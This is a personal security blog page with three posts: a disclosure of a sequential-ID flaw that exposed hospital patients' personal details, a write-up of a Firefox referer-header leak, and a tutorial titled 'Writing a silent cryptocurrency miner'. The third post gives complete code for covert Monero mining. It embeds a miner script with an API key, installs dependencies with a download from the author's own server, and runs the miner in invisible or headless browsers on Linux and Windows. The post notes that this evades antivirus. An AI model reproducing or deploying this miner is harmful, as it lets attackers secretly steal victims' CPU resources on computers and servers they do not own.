Saturday 17 March 2018

How Apollo Hospitals leaked 1 million customer details

About Apollo Hospitals:-

In 2015, Apollo Hospitals introduced its digital platform, Ask Apollo. The platform provides remote healthcare services. The platform connects patients with doctors remotely and provides services like a consultation with doctors via video, voice calls, and email. Apollo developed the platform in partnership with the Hyderabad-based emergency and healthcare management services firm, HealthNet Global and Vidyo
source: Wikipedia

I stumbled on this bug while I was booking a dental appointment with Apollo hospitals. This bug was leaking 1 MILLION customers details who booked an appoint online with apollo hospitals.

Since they are a big company, I thought it was my moral responsibility to help them get it fixed. But unfortunately, they never replied to my emails.



Then one day I heard of a nice guy named Elliot. Who disclosed a lot of vulnerabilities in Indian companies privately and helped them get it patched. So, I asked him if he could contact because he had more chances of getting a response.

And that worked. I am glad that apollo patched the vulnerability. But I wish like other companies they had a responsible disclosure program through which anyone could help them patch security issues in an ethical manner.

Details of the security issue:-

So Apollo Hospitals has an online appointment booking portal "www.askapollo.com" .



When we sign up, we get our profile created.





Now there is an option to print IPR form. When I clicked on it. I got my IPR form auto-filled.


The autofill request bought me into suspicion hence. I tried to look whats was going on in the background.




So the URL was
"https://www.askapollo.com/physical-appointment/PrintIPRForm.aspx?hashKey=11534XX"

Unfortunately hash key was not at all a hash, it was a plain sequential number. I tried to reduce the sequential ID. VIOLA an IDOR, I could see other persons IPA form which had sensitive informations like
Name
Address
DOB
Phone number
Email etc.



My sequential id was  11534XX which is (7 digits)... So, around 1 MILLION details of users could possibly get leaked if went in wrong hands.

I would like to thank Elliot again for creating awareness among Indian companies about the importance of security when everything is getting online.





Final words

We talk about Digital India but we are lacking very basic security measures almost everywhere. And as we are going more and more digital it's very essential that companies should handle their customer's data in a secure manner and one of the best methods is to have a responsible disclosure program.

A responsible disclosure policy is the initial first step in helping protect your company from an attack or premature vulnerability release to the public. The best part is they aren’t hard to set up and provide your team peace of mind when a researcher discovers a vulnerability. Getting started with responsible disclosure simply requires a security page that states –

What parts or sections of a site are within testing scope.
The types of bugs and vulns that are valid for submission.
A dedicated security email address to report the issue (often [email protected]).

https://www.bugcrowd.com/resource/what-is-responsible-disclosure/  (For more details)

If we look into counties like the USA... Their airforce, pentagon, defense websites, etc.  have also adopted responsible disclosure program. These actions and understanding make the USA ahead of India.
Example is here
https://hackerone.com/htaf2

If we look at facts and figures. Indians received the highest amount of rewards from facebook.com's bug-bounty program. Facebook rewards ethical hackers for finding and reporting security vulnerabilities on Facebook's website. This means we do have resources but we are neglecting it.

~Source
https://www.facebook.com/notes/facebook-bug-bounty/facebook-bug-bounty-5-million-paid-in-5-years/1419385021409053/

Another source

https://economictimes.indiatimes.com/tech/internet/bsnl-isro-cases-show-india-not-a-country-for-ethical-hackers/articleshow/63278882.cms?from=mdr

Indian companies need to be more open towards ethical hackers rather than being orthodox. Blogging about this bug was not to shame anyone. Its to spread awareness that we have to take security seriously, which is highly neglected in India.

Let's make the Internet a safer place :)




Thursday 1 February 2018

Firefox quantum browser referer leakage bug

This is one of the security issues I found while investigating another security bug. This was a security misconfiguration in Firefox Quantum browsers (v56 and above) which could leak sensitive URLs through referer header.

I would like to explain this bug in details!

What are referer headers?

The Referer request-header contains the address of the previous web page from which a link to the currently requested page was followed. The Referer header allows servers to identify where people are visiting them from and may use that data for analytics, logging, or optimized caching, etc.

source (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer)

So in simple words, when we are moving across a website or navigating across webpages, the next request has a referer header which has the URL details of the previous page.

Yes, its spelled as referer. Someone in the past mistook "referrer" as referer, and we are carrying it forward :)

Abuse of referer headers!

But this functionality became security issues at certain places.

For a modern web app. It's very common to have a password reset features, which sends you a password reset token to your email with which we can reset our passwords. The URL will be something like

https://www.somewebsite.com/passreset?token=thetoken

Now ist very common for a modern web app to have images hosted over CDN, or external javascript files as well as some external links on the footer page when the password reset page is opened. When these urls are called, or any external link is clicked, the referer header is carried along

 https://www.somewebsite.com/passreset?token=thetoken

Hence its leaking your password reset token, or perhaps session tokens, etc. to an external website.

So one of our 3rd party might be getting all your user's password reset tokens in their logs.
Bad right?

The fix:- 

The HTML attribute

rel="noopener noreferrer" 

is used to instruct the browser not to send any referer header upon clicking the external link.

So if your website has a footer which links to suppose "shashank.co" and as a website owner, you wish that your client's referer header is not leaked to "shashank.co". So you do this!

<a href="https://www.shashank.co" target="_blank" rel="noopener noreferrer">', '</a>

The above code will fix this issue.


Now the Firefox quantum browser was failing to act on rel="noopener noreferrer" and was still sending referer headers to external links.



I reported this bug. Unfortunately, it was duplicate of some similar report which was pointed out for pinned tabs. I still have no idea how someone spotted for pinned tabs when it was also not working for normal tabs with external links.

This bug has been fixed in Firefox v59 (Beta).








Saturday 13 January 2018

Writing a silent cryptocurrency miner (Monero) in 6 lines of code

Hidden Crypto currency mining has always been a game for blackhat hackers to make money out of it. After reading a lot of blog and news about hackers injecting silent miners to hacked computers, servers and websites, I thought of playing with it.

Note this blog is just for awareness of cryptocurrency hidden miners. I am not responsible for what my readers do with my codes. And I never suggest anyone deploy cryptocurrency miners on unauthorized computers. 

Lets first understand what mining is?

Cryptocurrency mining includes two functions, i.e., adding transactions to the blockchain (securing and verifying) and also releasing new currency. Individual blocks added by miners should contain a proof-of-work or PoW.
Mining needs a computer and a special program(provided by developers of the community), which helps miners compete with their peers in solving complicated mathematical problems. This would need huge computer resources. In regular intervals, miners would attempt to solve a block having the transaction data using cryptographic hash functions.

Now, as we already know that bitcoin transactions are kind of traceable. Hard but still possible. So in the recent trends, I found that most of the blackhat hackers shifted to monero mining. When I heard about monero in the news I wanted to figure out why monero?

The reasons are:-

1) Monero is private and untraceable  crypto currency.

But this doesn't fully answer our question because there are other cryptocurrencies too, which are untraceable like zcash, dash (earlier know as dark coin), verge, etc.

After a bit more research, I found my answer.

2) Monero uses "cryptonote" algorithm. Which rules out asci miners and hence mining is dependent on CPU and GPU, which means the mining difficulty is lower than what we have with bitcoin also it is better suited for regular consumer laptops and PCs.

This makes CPU mining feasible for users and a golden opportunity for hackers to bot/mass mine Monero on hacked computers.

Next question was how simple can this be?
Let's learn it by doing it!

Building a Monero Miner Linux (Ubuntu for example):-

Note:- I am a horrible coder. Hence I try to make my codes easy, to write less number of lines with less complexity no matter how horrible the code is. I am fine if it works :)

Preparing a list, how to make a silent miner!

1) A reliable miner manager.
2) Make it run invisible/silently on a system.

The best miner I could fine was a javascript one. Created by "https://coinhive.com/." It's free to signup, and they take 30% commission for using their miner.

But then this a browser based miner, to execute it on a hacked system we need to fire the miner in a system's browser and that too invisible.

As far as I knew that for browser automation, selenium is used.

Now we just embed our javascript code from coinhive and use our API public API key to trigger the miner.

Code file.html

<HTML>
<head>
<title>Test</title>
</head>
<body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('3yvOKgHxX9ZsPB9x78IjhQ1C4xCDDhJx');
miner.start();
</script>
</body>
</HTML>



Next step is to open the HTML file silently on a system's browser. So we host our file somewhere . And make selenium trigger the URL.

First, we need to install dependencies. I wrote a script that installs all the dependencies in one go.

Code script.py

import os
os.system("apt-get -y install python3-pip")
os.system("pip3 install selenium")
os.system("pip3 install pyvirtualdisplay")
os.system("apt-get -y install firefox xvfb")
os.system("wget http://yourwebsite.com/geckodriver")
os.system("mv geckodriver /usr/local/bin")
os.system("chmod 7777 /usr/local/bin/geckodriver")
os.system("sudo python3 selenium_miner.py") 

Understanding the code:-
So we are installing python virtual display which is a wrapper of xvfb for python.
Selenium which is required for browser automation.
And then we need geckodriver for triggering Firefox from selenium.

Gecko driver for Linux can be downloaded from here

"https://github.com/mozilla/geckodriver/releases"

When we unzip the downloaded file from there, we get geckodriver file in it. In 5th line, I am just fetching the unzipped file from my own server.

In 6th line, I am moving it to the bin directly so as I don't have to mention the path of geckodriver in my further code

The last line finally calls the miner file to run, whose code is below.


Code selenium_miner.py

from pyvirtualdisplay import Display
from selenium import webdriver
display = Display(visible=0, size=(1024, 768))
display.start()
browser = webdriver.Firefox()
browser.get('http://www.yourwebsite.com/file.html')



This code simply made the visibility to zero and calls the URL where the miner is hosted (our file.html). Since I didn't exit the selenium, so the HTML file is open in a hidden firefox browser, till the system is running and the HTML file with the javascript code is using the systems CPU for mining Monero.

Windows miner:-

There are two ways of doing it.
Since there is no available wrapper for python virtual driver, I had to look for an alternative.

I found that phantomjs provides a ghost browser for windows

Code windows_miner1.py

from selenium import webdriver
path="C:\\Python27\\python\\phantom\\bin\\phantomjs.exe"
browser = webdriver.PhantomJS(path)
browser.get('http://www.yourwebsite.com/file.html')


In the code above the path, a variable is to set the path of your phantom js ghost driver which can be downloaded from here

"http://phantomjs.org/download.html"

In the bin folder, there is a phantomjs.exe. That path is to be mentioned in the variable.


This was my first approach. But then I went for a more straightforward approach. While strolling the internet, I found that chrome had enabled headless mode. That's all we need :)

Code windows_miner2.py

import os
import subprocess
path = subprocess.Popen(['cd'], stdout=subprocess.PIPE, shell=True)
for line in path.stdout:
continue
path.wait()
paths = (str(line).strip()) + "\Gchrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://www.yourwebsite.com/file.html"
os.system(paths)

Where Gchome is your portable chrome executable or simply mention the file path of your chome.exe file.

Now many readers will think why did I ever write python code for windows miner because windows systems don't have python installed by default.

Because I am not good with c and c++ and I figured out py2exe. Tried and tested on my system, works like a charm!

Go to "http://py2exe.net" and get your executable.

Now comes the final question! How do I prevent hackers from stealing my CPU resources for their benefits?

My answer is feeling your loving PC <3. If you ever find your system fans working all the time even though you are not performing a heavy task. Go to your task manager and check if any unusual program is using all the remaining CPU resources.

If you see a sudden spike in CPU resources of your server. Use the command "top" in your server terminal to check if any unwanted program is using your CPU resources.

The best part is since everything is happening over the browser that too with javascript, it will go undetected from most of the anti-viruses.

All the source codes can be found here
https://github.com/Shashank-In/silent-monero-miner

Stay safe ;-)
Cheers Shashank